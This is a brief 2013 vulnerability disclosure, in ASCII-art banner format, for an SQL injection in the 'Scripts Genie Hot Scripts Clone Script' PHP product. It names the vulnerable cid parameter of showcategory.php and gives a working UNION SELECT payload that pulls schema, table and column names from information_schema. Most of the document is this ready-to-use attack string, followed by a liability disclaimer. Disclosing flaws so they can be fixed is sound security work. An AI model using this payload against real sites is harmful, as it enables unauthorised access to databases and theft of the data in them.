-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ Security Flaw +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ __ _ +
+ ___ ___ ___ _ _ /\ \ \___| |_ +
+/ __|/ _ \/ __| | | |/ \/ / _ \ __| +
+\__ \ __/ (__| |_| / /\ / __/ |_ +
+|___/\___|\___|\__,_\_\ \/ \___|\__| +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+ SQL Injection Vulnerability PoC +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+ Discovered by Easy Laster +
+ Autor : Easy Laster +
+ Date :17.02.2013 +
+ Script:Scripts Genie +
+ Hot Scripts Clone Script +
+ scriptsgenie.com +
+ Price ::$1.75 +
+ Language: PHP +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Vulnerability +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Proof of Concept +
+ Crawling the MYSQL Stack +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information